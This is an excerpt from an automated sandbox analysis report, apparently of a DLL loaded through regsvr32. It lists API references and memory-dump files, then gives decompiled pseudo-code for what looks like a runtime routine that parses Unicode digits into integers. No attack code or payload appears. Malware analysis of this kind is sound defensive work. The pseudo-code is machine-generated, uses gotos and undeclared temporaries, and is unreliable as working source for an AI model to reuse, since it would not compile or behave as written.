                                                                                                        0x7ffc2890317f
                                                                                                        0x7ffc2890318f
                                                                                                        0x7ffc28903196
                                                                                                        0x7ffc289031a0
                                                                                                        0x7ffc289031a8
                                                                                                        0x7ffc289031b2
                                                                                                        0x7ffc289031bc
                                                                                                        0x7ffc289031d4
                                                                                                        0x7ffc289031de
                                                                                                        0x7ffc289031fb
                                                                                                        0x7ffc28903218

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC28902250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC2890226B
                                                                                                          • Part of subcall function 00007FFC28902250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC2890227C
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28902FF6
                                                                                                          • Part of subcall function 00007FFC289018F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289018FE
                                                                                                          • Part of subcall function 00007FFC28903240: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC28903310
                                                                                                          • Part of subcall function 00007FFC28903240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC289033A8
                                                                                                          • Part of subcall function 00007FFC28903240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC289033C2
                                                                                                          • Part of subcall function 00007FFC28903240: char_traits.LIBCPMTD ref: 00007FFC289033E2
                                                                                                        • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC289030A5
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC289030E3
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC289030FF
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC28903121
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28903196
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC289031B2
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC289031D4
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC289031DE
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC289031FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$Mtx_guardMtx_guard::~_$EmptyQueue::Structured
                                                                                                        • String ID:
                                                                                                        • API String ID: 4284633421-0
                                                                                                        • Opcode ID: fedfd89c1444a20ff6c1338be1c38f592e3b580ca3ebc7448f5feb0f8b9903a7
                                                                                                        • Instruction ID: 89953d27fe8e0a32316d62399db8fe5ae7e10c2067d1959a454b739d0a7558bd
                                                                                                        • Opcode Fuzzy Hash: fedfd89c1444a20ff6c1338be1c38f592e3b580ca3ebc7448f5feb0f8b9903a7
                                                                                                        • Instruction Fuzzy Hash: 0451D226A1CB9582DA50EB69E85136AA3A0FBC4791F105137EBCD43BAADF3DD041CF14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 40%
                                                                                                        			E00007FFC7FFC2890893C(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                        				void* _v64;
                                                                                                        				intOrPtr _v68;
                                                                                                        				intOrPtr _v72;
                                                                                                        				intOrPtr _v76;
                                                                                                        				intOrPtr _v80;
                                                                                                        				intOrPtr _v84;
                                                                                                        				intOrPtr _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				intOrPtr _v96;
                                                                                                        				intOrPtr _v100;
                                                                                                        				intOrPtr _v104;
                                                                                                        				intOrPtr _v108;
                                                                                                        				intOrPtr _v112;
                                                                                                        				intOrPtr _v116;
                                                                                                        				intOrPtr _v120;
                                                                                                        				intOrPtr _v124;
                                                                                                        				intOrPtr _v128;
                                                                                                        				intOrPtr _v132;
                                                                                                        				intOrPtr _v136;
                                                                                                        				intOrPtr _v140;
                                                                                                        				intOrPtr _v144;
                                                                                                        				intOrPtr _v148;
                                                                                                        				intOrPtr _v152;
                                                                                                        				long long _v160;
                                                                                                        				long long _v168;
                                                                                                        				void* __rsi;
                                                                                                        				void* __rbp;
                                                                                                        				void* _t155;
                                                                                                        				void* _t185;
                                                                                                        				signed short _t199;
                                                                                                        				signed short _t200;
                                                                                                        				signed int _t201;
                                                                                                        				signed int _t250;
                                                                                                        				signed int _t252;
                                                                                                        				signed int _t254;
                                                                                                        				signed int _t255;
                                                                                                        				signed int _t258;
                                                                                                        				signed int _t261;
                                                                                                        				signed short* _t380;
                                                                                                        				signed short* _t381;
                                                                                                        				signed short* _t382;
                                                                                                        				signed short* _t384;
                                                                                                        				signed short** _t385;
                                                                                                        				long long _t386;
                                                                                                        				long long* _t389;
                                                                                                        				signed short* _t390;
                                                                                                        				long long* _t394;
                                                                                                        				long long* _t395;
                                                                                                        				long long* _t396;
                                                                                                        				signed short** _t397;
                                                                                                        				void* _t398;
                                                                                                        				void* _t399;
                                                                                                        				signed short* _t404;
                                                                                                        				signed short* _t405;
                                                                                                        				long long _t406;
                                                                                                        				signed short* _t407;
                                                                                                        				long long _t408;
                                                                                                        				intOrPtr _t409;
                                                                                                        
                                                                                                        				_t403 = __r8;
                                                                                                        				_t394 = __rdx;
                                                                                                        				_t386 = __rbx;
                                                                                                        				_a24 = __rbx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_t406 =  *((intOrPtr*)(__rdx));
                                                                                                        				r13d = 0;
                                                                                                        				_t255 = r9b & 0xffffffff;
                                                                                                        				r14d = r8d;
                                                                                                        				_v64 = _t406;
                                                                                                        				_t397 = __rdx;
                                                                                                        				if (_t406 != 0) goto 0x28908987;
                                                                                                        				E00007FFC7FFC2890B420(__rax);
                                                                                                        				 *__rax = 0x16;
                                                                                                        				E00007FFC7FFC28909744();
                                                                                                        				goto 0x289089b9;
                                                                                                        				if (r14d == 0) goto 0x289089d1;
                                                                                                        				_t4 = _t403 - 2; // -2
                                                                                                        				if (_t4 - 0x22 <= 0) goto 0x289089d1;
                                                                                                        				_v160 = __rcx;
                                                                                                        				r9d = 0;
                                                                                                        				 *((char*)(__rcx + 0x30)) = 1;
                                                                                                        				r8d = 0;
                                                                                                        				 *(__rcx + 0x2c) = 0x16;
                                                                                                        				_v168 = _t408;
                                                                                                        				E00007FFC7FFC28909674(__rax, __rbx, __rcx, __rdx, _t398, _t399, __r8);
                                                                                                        				_t389 = _t397[1];
                                                                                                        				if (_t389 == 0) goto 0x2890901d;
                                                                                                        				 *_t389 =  *_t397;
                                                                                                        				goto 0x2890901d;
                                                                                                        				 *_t394 = _t406 + 2;
                                                                                                        				_t260 = r13d;
                                                                                                        				if ( *((intOrPtr*)(_t389 + 0x28)) != r13b) goto 0x289089fb;
                                                                                                        				0x28909140();
                                                                                                        				goto 0x289089fb;
                                                                                                        				_t378 =  *_t397;
                                                                                                        				 *_t397 =  &(( *_t397)[1]);
                                                                                                        				if (E00007FFC7FFC2890B244( *_t378 & 0xffff, 8, _t386, _t389) != 0) goto 0x289089ee;
                                                                                                        				_t257 =  !=  ? _t255 : _t255 | 0x00000002;
                                                                                                        				if ((0x0000fffd & _t386 - 0x0000002b) != 0) goto 0x28908a32;
                                                                                                        				_t380 =  *_t397;
                                                                                                        				_t199 =  *_t380 & 0x0000ffff;
                                                                                                        				_t381 =  &(_t380[1]);
                                                                                                        				 *_t397 = _t381;
                                                                                                        				_a16 = 0xa70;
                                                                                                        				_v152 = 0xae6;
                                                                                                        				_v148 = 0xaf0;
                                                                                                        				_v144 = 0xb66;
                                                                                                        				r8d = 0x660;
                                                                                                        				_v140 = 0xb70;
                                                                                                        				_t20 = _t381 - 0x80; // 0x5e0
                                                                                                        				r9d = _t20;
                                                                                                        				_v136 = 0xc66;
                                                                                                        				r10d = 0x6f0;
                                                                                                        				_v132 = 0xc70;
                                                                                                        				r11d = 0x966;
                                                                                                        				_v128 = 0xce6;
                                                                                                        				_v124 = 0xcf0;
                                                                                                        				_v120 = 0xd66;
                                                                                                        				_v116 = 0xd70;
                                                                                                        				_v112 = 0xe50;
                                                                                                        				_v108 = 0xe5a;
                                                                                                        				_v104 = 0xed0;
                                                                                                        				_v100 = 0xeda;
                                                                                                        				_v96 = 0xf20;
                                                                                                        				_v92 = 0xf2a;
                                                                                                        				_v88 = 0x1040;
                                                                                                        				_v84 = 0x104a;
                                                                                                        				_v80 = 0x17e0;
                                                                                                        				_v76 = 0x17ea;
                                                                                                        				_v72 = 0x1810;
                                                                                                        				_v68 = 0xff1a;
                                                                                                        				if ((r14d & 0xffffffef) != 0) goto 0x28908da0;
                                                                                                        				if (_t199 - 0x30 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - 0x3a >= 0) goto 0x28908b3e;
                                                                                                        				goto 0x28908cea;
                                                                                                        				if (_t199 - 0xff10 >= 0) goto 0x28908cdb;
                                                                                                        				if (_t199 - r8w < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - 0x66a >= 0) goto 0x28908b66;
                                                                                                        				goto 0x28908cea;
                                                                                                        				if (_t199 - r10w < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - 0x6fa >= 0) goto 0x28908b85;
                                                                                                        				goto 0x28908cea;
                                                                                                        				if (_t199 - r11w < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - 0x970 >= 0) goto 0x28908ba4;
                                                                                                        				goto 0x28908cea;
                                                                                                        				if (_t199 - r9w < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - 0x9f0 >= 0) goto 0x28908bc3;
                                                                                                        				goto 0x28908cea;
                                                                                                        				if (_t199 - (_t199 & 0x0000ffff) - r9d < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _a16 >= 0) goto 0x28908be3;
                                                                                                        				goto 0x28908cea;
                                                                                                        				if (_t199 - _v152 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v148 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v144 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v140 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v136 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v132 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v128 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v124 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v120 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v116 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v112 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v108 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v104 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v100 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v96 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v92 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v88 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v84 < 0) goto 0x28908b34;
                                                                                                        				if (_t199 - _v80 < 0) goto 0x28908cef;
                                                                                                        				if (_t199 - _v76 < 0) goto 0x28908b34;
                                                                                                        				if ((_t199 & 0x0000ffff) - _v72 - 9 > 0) goto 0x28908cef;
                                                                                                        				goto 0x28908b34;
                                                                                                        				if (_t199 - _v68 >= 0) goto 0x28908cef;
                                                                                                        				if ((_t199 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x28908d11;
                                                                                                        				_t64 = _t389 - 0x41; // -17
                                                                                                        				_t65 = _t389 - 0x61; // -49
                                                                                                        				_t155 = _t65;
                                                                                                        				if (_t64 - 0x19 <= 0) goto 0x28908d06;
                                                                                                        				if (_t155 - 0x19 > 0) goto 0x28908d91;
                                                                                                        				if (_t155 - 0x19 > 0) goto 0x28908d0e;
                                                                                                        				_t66 = _t389 - 0x37; // -231
                                                                                                        				if (_t66 != 0) goto 0x28908d91;
                                                                                                        				_t390 =  *_t397;
                                                                                                        				r9d = 0xffdf;
                                                                                                        				_t250 =  *_t390 & 0x0000ffff;
                                                                                                        				_t67 =  &(_t390[1]); // 0xffe1
                                                                                                        				_t404 = _t67;
                                                                                                        				 *_t397 = _t404;
                                                                                                        				_t68 = _t394 - 0x58; // 0x698
                                                                                                        				if ((r9w & _t68) == 0) goto 0x28908d79;
                                                                                                        				 *_t397 = _t390;
                                                                                                        				_t159 =  !=  ? r14d : 8;
                                                                                                        				r14d =  !=  ? r14d : 8;
                                                                                                        				if (_t250 == 0) goto 0x28908d71;
                                                                                                        				if ( *_t390 == _t250) goto 0x28908d71;
                                                                                                        				E00007FFC7FFC2890B420(_t381);
                                                                                                        				 *_t381 = 0x16;
                                                                                                        				E00007FFC7FFC28909744();
                                                                                                        				r8d = 0x660;
                                                                                                        				r10d = 0x6f0;
                                                                                                        				r11d = 0x966;
                                                                                                        				goto 0x28908da0;
                                                                                                        				r8d = 0x660;
                                                                                                        				goto 0x28908da0;
                                                                                                        				_t200 =  *_t404 & 0x0000ffff;
                                                                                                        				_t71 =  &(_t404[1]); // 0xffe3
                                                                                                        				_t382 = _t71;
                                                                                                        				 *_t397 = _t382;
                                                                                                        				r8d = 0x660;
                                                                                                        				goto 0x28908d96;
                                                                                                        				_t164 =  !=  ? r14d : 0xa;
                                                                                                        				r14d = 0xa;
                                                                                                        				_t165 = ( !=  ? r14d : 0xa) | 0xffffffff;
                                                                                                        				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                                                        				_t252 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                                                        				r12d = 0x30;
                                                                                                        				r15d = 0xff10;
                                                                                                        				r9d = 0xa / r14d;
                                                                                                        				if (_t200 - r12w < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - 0x3a >= 0) goto 0x28908dd2;
                                                                                                        				goto 0x28908f6b;
                                                                                                        				if (_t200 - r15w >= 0) goto 0x28908f5b;
                                                                                                        				if (_t200 - r8w < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - 0x66a >= 0) goto 0x28908dfb;
                                                                                                        				goto 0x28908f6b;
                                                                                                        				if (_t200 - r10w < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - 0x6fa >= 0) goto 0x28908e1a;
                                                                                                        				goto 0x28908f6b;
                                                                                                        				if (_t200 - r11w < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - 0x970 >= 0) goto 0x28908e39;
                                                                                                        				goto 0x28908f6b;
                                                                                                        				if (_t200 - 0x9e6 < 0) goto 0x28908f70;
                                                                                                        				_t76 =  &(_t382[5]); // 0x9f0
                                                                                                        				if (_t200 - _t76 >= 0) goto 0x28908e59;
                                                                                                        				goto 0x28908f6b;
                                                                                                        				if (_t200 - 0xa66 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _a16 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v152 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v148 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v144 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v140 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v136 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v132 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v128 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v124 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v120 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v116 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v112 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v108 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v104 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v100 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v96 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v92 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v88 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v84 < 0) goto 0x28908e4f;
                                                                                                        				if (_t200 - _v80 < 0) goto 0x28908f70;
                                                                                                        				if (_t200 - _v76 < 0) goto 0x28908e4f;
                                                                                                        				if ((_t200 & 0x0000ffff) - _v72 - 9 > 0) goto 0x28908f70;
                                                                                                        				goto 0x28908f6b;
                                                                                                        				if (_t200 - _v68 >= 0) goto 0x28908f70;
                                                                                                        				if ((_t200 & 0x0000ffff) - r15d != 0xffffffff) goto 0x28908f93;
                                                                                                        				_t100 = _t390 - 0x41; // -65
                                                                                                        				_t101 = _t390 - 0x61; // -97
                                                                                                        				_t185 = _t101;
                                                                                                        				if (_t100 - 0x19 <= 0) goto 0x28908f83;
                                                                                                        				if (_t185 - 0x19 > 0) goto 0x28908f90;
                                                                                                        				if (_t185 - 0x19 > 0) goto 0x28908f8b;
                                                                                                        				goto 0x28908f93;
                                                                                                        				_t405 =  *_t397;
                                                                                                        				if (((_t200 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0x28908fd7;
                                                                                                        				_t201 =  *_t405 & 0x0000ffff;
                                                                                                        				_t254 = _t382 + _t390;
                                                                                                        				_t261 = _t254;
                                                                                                        				_t107 =  &(_t405[1]); // 0x2
                                                                                                        				r8d = 0x660;
                                                                                                        				 *_t397 = _t107;
                                                                                                        				_t258 = ( !=  ? _t255 : _t255 | 0x00000002) | (r13d & 0xffffff00 | _t254 - r13d * r14d > 0x00000000 | r13d & 0xffffff00 | _t260 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
                                                                                                        				goto 0x28908db7;
                                                                                                        				_t409 = _a8;
                                                                                                        				_t109 = _t405 - 2; // -2
                                                                                                        				_t384 = _t109;
                                                                                                        				_t407 = _v64;
                                                                                                        				 *_t397 = _t384;
                                                                                                        				if (_t201 == 0) goto 0x28909008;
                                                                                                        				if ( *_t384 == _t201) goto 0x28909008;
                                                                                                        				E00007FFC7FFC2890B420(_t384);
                                                                                                        				 *_t384 = 0x16;
                                                                                                        				E00007FFC7FFC28909744();
                                                                                                        				if ((sil & 0x00000008) != 0) goto 0x28909024;
                                                                                                        				_t385 = _t397[1];
                                                                                                        				 *_t397 = _t407;
                                                                                                        				if (_t385 == 0) goto 0x2890901d;
                                                                                                        				 *_t385 = _t407;
                                                                                                        				goto 0x289090a8;
                                                                                                        				r8d = 0x80000000;
                                                                                                        				_t114 = _t405 - 1; // -1
                                                                                                        				r9d = _t114;
                                                                                                        				if ((sil & 0x00000004) != 0) goto 0x2890904c;
                                                                                                        				if ((sil & 0x00000001) == 0) goto 0x2890908f;
                                                                                                        				if ((sil & 0x00000002) == 0) goto 0x28909047;
                                                                                                        				if (_t261 - r8d <= 0) goto 0x28909095;
                                                                                                        				goto 0x2890904c;
                                                                                                        				if (_t261 - r9d <= 0) goto 0x28909097;
                                                                                                        				 *((char*)(_t409 + 0x30)) = 1;
                                                                                                        				 *((intOrPtr*)(_t409 + 0x2c)) = 0x22;
                                                                                                        				if ((_t258 & 0x00000001) != 0) goto 0x28909067;
                                                                                                        				goto 0x28909097;
                                                                                                        				_t395 = _t397[1];
                                                                                                        				if ((_t258 & 0x00000002) == 0) goto 0x2890907f;
                                                                                                        				if (_t395 == 0) goto 0x2890907a;
                                                                                                        				 *_t395 =  *_t397;
                                                                                                        				goto 0x289090a8;
                                                                                                        				if (_t395 == 0) goto 0x2890908a;
                                                                                                        				 *_t395 =  *_t397;
                                                                                                        				goto 0x289090a8;
                                                                                                        				if ((sil & 0x00000002) == 0) goto 0x28909097;
                                                                                                        				_t396 = _t397[1];
                                                                                                        				if (_t396 == 0) goto 0x289090a6;
                                                                                                        				 *_t396 =  *_t397;
                                                                                                        				return  ~(_t261 | 0xffffffff);
                                                                                                        			}





























































                                                                                                        0x7ffc2890893c
                                                                                                        0x7ffc2890893c
                                                                                                        0x7ffc2890893c
                                                                                                        0x7ffc2890893c
                                                                                                        0x7ffc28908941
                                                                                                        0x7ffc28908958
                                                                                                        0x7ffc2890895b
                                                                                                        0x7ffc2890895e
                                                                                                        0x7ffc28908962
                                                                                                        0x7ffc28908965
                                                                                                        0x7ffc2890896d
                                                                                                        0x7ffc28908973
                                                                                                        0x7ffc28908975
                                                                                                        0x7ffc2890897a
                                                                                                        0x7ffc28908980
                                                                                                        0x7ffc28908985
                                                                                                        0x7ffc2890898a
                                                                                                        0x7ffc2890898c
                                                                                                        0x7ffc28908993
                                                                                                        0x7ffc28908995
                                                                                                        0x7ffc2890899a
                                                                                                        0x7ffc2890899d
                                                                                                        0x7ffc289089a1
                                                                                                        0x7ffc289089a4
                                                                                                        0x7ffc289089af
                                                                                                        0x7ffc289089b4
                                                                                                        0x7ffc289089b9
                                                                                                        0x7ffc289089c0
                                                                                                        0x7ffc289089c9
                                                                                                        0x7ffc289089cc
                                                                                                        0x7ffc289089db
                                                                                                        0x7ffc289089de
                                                                                                        0x7ffc289089e5
                                                                                                        0x7ffc289089e7
                                                                                                        0x7ffc289089ec
                                                                                                        0x7ffc289089ee
                                                                                                        0x7ffc289089f8
                                                                                                        0x7ffc28908a0a
                                                                                                        0x7ffc28908a1a
                                                                                                        0x7ffc28908a23
                                                                                                        0x7ffc28908a25
                                                                                                        0x7ffc28908a28
                                                                                                        0x7ffc28908a2b
                                                                                                        0x7ffc28908a2f
                                                                                                        0x7ffc28908a32
                                                                                                        0x7ffc28908a42
                                                                                                        0x7ffc28908a4f
                                                                                                        0x7ffc28908a5c
                                                                                                        0x7ffc28908a64
                                                                                                        0x7ffc28908a6a
                                                                                                        0x7ffc28908a72
                                                                                                        0x7ffc28908a72
                                                                                                        0x7ffc28908a76
                                                                                                        0x7ffc28908a7e
                                                                                                        0x7ffc28908a84
                                                                                                        0x7ffc28908a8c
                                                                                                        0x7ffc28908a92
                                                                                                        0x7ffc28908a9a
                                                                                                        0x7ffc28908aa2
                                                                                                        0x7ffc28908aaa
                                                                                                        0x7ffc28908ab2
                                                                                                        0x7ffc28908aba
                                                                                                        0x7ffc28908ac2
                                                                                                        0x7ffc28908aca
                                                                                                        0x7ffc28908ad2
                                                                                                        0x7ffc28908ada
                                                                                                        0x7ffc28908ae2
                                                                                                        0x7ffc28908aea
                                                                                                        0x7ffc28908af2
                                                                                                        0x7ffc28908afa
                                                                                                        0x7ffc28908b02
                                                                                                        0x7ffc28908b0d
                                                                                                        0x7ffc28908b1f
                                                                                                        0x7ffc28908b28
                                                                                                        0x7ffc28908b32
                                                                                                        0x7ffc28908b39
                                                                                                        0x7ffc28908b41
                                                                                                        0x7ffc28908b4b
                                                                                                        0x7ffc28908b59
                                                                                                        0x7ffc28908b61
                                                                                                        0x7ffc28908b6a
                                                                                                        0x7ffc28908b78
                                                                                                        0x7ffc28908b80
                                                                                                        0x7ffc28908b89
                                                                                                        0x7ffc28908b97
                                                                                                        0x7ffc28908b9f
                                                                                                        0x7ffc28908ba8
                                                                                                        0x7ffc28908bb6
                                                                                                        0x7ffc28908bbe
                                                                                                        0x7ffc28908bc6
                                                                                                        0x7ffc28908bd4
                                                                                                        0x7ffc28908bde
                                                                                                        0x7ffc28908bea
                                                                                                        0x7ffc28908bf5
                                                                                                        0x7ffc28908c02
                                                                                                        0x7ffc28908c0d
                                                                                                        0x7ffc28908c1a
                                                                                                        0x7ffc28908c25
                                                                                                        0x7ffc28908c32
                                                                                                        0x7ffc28908c3d
                                                                                                        0x7ffc28908c4a
                                                                                                        0x7ffc28908c55
                                                                                                        0x7ffc28908c62
                                                                                                        0x7ffc28908c6d
                                                                                                        0x7ffc28908c7a
                                                                                                        0x7ffc28908c81
                                                                                                        0x7ffc28908c8e
                                                                                                        0x7ffc28908c95
                                                                                                        0x7ffc28908ca2
                                                                                                        0x7ffc28908ca9
                                                                                                        0x7ffc28908cb6
                                                                                                        0x7ffc28908cbd
                                                                                                        0x7ffc28908cd4
                                                                                                        0x7ffc28908cd6
                                                                                                        0x7ffc28908ce3
                                                                                                        0x7ffc28908ced
                                                                                                        0x7ffc28908cf2
                                                                                                        0x7ffc28908cf8
                                                                                                        0x7ffc28908cf8
                                                                                                        0x7ffc28908cfb
                                                                                                        0x7ffc28908d00
                                                                                                        0x7ffc28908d09
                                                                                                        0x7ffc28908d0e
                                                                                                        0x7ffc28908d13
                                                                                                        0x7ffc28908d15
                                                                                                        0x7ffc28908d18
                                                                                                        0x7ffc28908d1e
                                                                                                        0x7ffc28908d21
                                                                                                        0x7ffc28908d21
                                                                                                        0x7ffc28908d25
                                                                                                        0x7ffc28908d28
                                                                                                        0x7ffc28908d2f
                                                                                                        0x7ffc28908d34
                                                                                                        0x7ffc28908d3c
                                                                                                        0x7ffc28908d40
                                                                                                        0x7ffc28908d46
                                                                                                        0x7ffc28908d4b
                                                                                                        0x7ffc28908d4d
                                                                                                        0x7ffc28908d52
                                                                                                        0x7ffc28908d58
                                                                                                        0x7ffc28908d5d
                                                                                                        0x7ffc28908d63
                                                                                                        0x7ffc28908d69
                                                                                                        0x7ffc28908d6f
                                                                                                        0x7ffc28908d71
                                                                                                        0x7ffc28908d77
                                                                                                        0x7ffc28908d79
                                                                                                        0x7ffc28908d7d
                                                                                                        0x7ffc28908d7d
                                                                                                        0x7ffc28908d81
                                                                                                        0x7ffc28908d84
                                                                                                        0x7ffc28908d8f
                                                                                                        0x7ffc28908d99
                                                                                                        0x7ffc28908d9d
                                                                                                        0x7ffc28908da2
                                                                                                        0x7ffc28908da5
                                                                                                        0x7ffc28908da5
                                                                                                        0x7ffc28908da8
                                                                                                        0x7ffc28908dae
                                                                                                        0x7ffc28908db4
                                                                                                        0x7ffc28908dbb
                                                                                                        0x7ffc28908dc5
                                                                                                        0x7ffc28908dcd
                                                                                                        0x7ffc28908dd6
                                                                                                        0x7ffc28908de0
                                                                                                        0x7ffc28908dee
                                                                                                        0x7ffc28908df6
                                                                                                        0x7ffc28908dff
                                                                                                        0x7ffc28908e0d
                                                                                                        0x7ffc28908e15
                                                                                                        0x7ffc28908e1e
                                                                                                        0x7ffc28908e2c
                                                                                                        0x7ffc28908e34
                                                                                                        0x7ffc28908e41
                                                                                                        0x7ffc28908e47
                                                                                                        0x7ffc28908e4d
                                                                                                        0x7ffc28908e54
                                                                                                        0x7ffc28908e61
                                                                                                        0x7ffc28908e6f
                                                                                                        0x7ffc28908e78
                                                                                                        0x7ffc28908e83
                                                                                                        0x7ffc28908e8c
                                                                                                        0x7ffc28908e97
                                                                                                        0x7ffc28908ea0
                                                                                                        0x7ffc28908eab
                                                                                                        0x7ffc28908eb4
                                                                                                        0x7ffc28908ebf
                                                                                                        0x7ffc28908ec8
                                                                                                        0x7ffc28908ed3
                                                                                                        0x7ffc28908ee0
                                                                                                        0x7ffc28908eeb
                                                                                                        0x7ffc28908ef8
                                                                                                        0x7ffc28908eff
                                                                                                        0x7ffc28908f0c
                                                                                                        0x7ffc28908f13
                                                                                                        0x7ffc28908f20
                                                                                                        0x7ffc28908f27
                                                                                                        0x7ffc28908f34
                                                                                                        0x7ffc28908f3b
                                                                                                        0x7ffc28908f52
                                                                                                        0x7ffc28908f59
                                                                                                        0x7ffc28908f63
                                                                                                        0x7ffc28908f6e
                                                                                                        0x7ffc28908f73
                                                                                                        0x7ffc28908f79
                                                                                                        0x7ffc28908f79
                                                                                                        0x7ffc28908f7c
                                                                                                        0x7ffc28908f81
                                                                                                        0x7ffc28908f86
                                                                                                        0x7ffc28908f8e
                                                                                                        0x7ffc28908f93
                                                                                                        0x7ffc28908f99
                                                                                                        0x7ffc28908f9b
                                                                                                        0x7ffc28908fa5
                                                                                                        0x7ffc28908fb6
                                                                                                        0x7ffc28908fbd
                                                                                                        0x7ffc28908fc4
                                                                                                        0x7ffc28908fcd
                                                                                                        0x7ffc28908fd0
                                                                                                        0x7ffc28908fd2
                                                                                                        0x7ffc28908fd7
                                                                                                        0x7ffc28908fdf
                                                                                                        0x7ffc28908fdf
                                                                                                        0x7ffc28908fe3
                                                                                                        0x7ffc28908feb
                                                                                                        0x7ffc28908ff1
                                                                                                        0x7ffc28908ff6
                                                                                                        0x7ffc28908ff8
                                                                                                        0x7ffc28908ffd
                                                                                                        0x7ffc28909003
                                                                                                        0x7ffc2890900c
                                                                                                        0x7ffc2890900e
                                                                                                        0x7ffc28909012
                                                                                                        0x7ffc28909018
                                                                                                        0x7ffc2890901a
                                                                                                        0x7ffc2890901f
                                                                                                        0x7ffc28909024
                                                                                                        0x7ffc2890902a
                                                                                                        0x7ffc2890902a
                                                                                                        0x7ffc28909032
                                                                                                        0x7ffc28909038
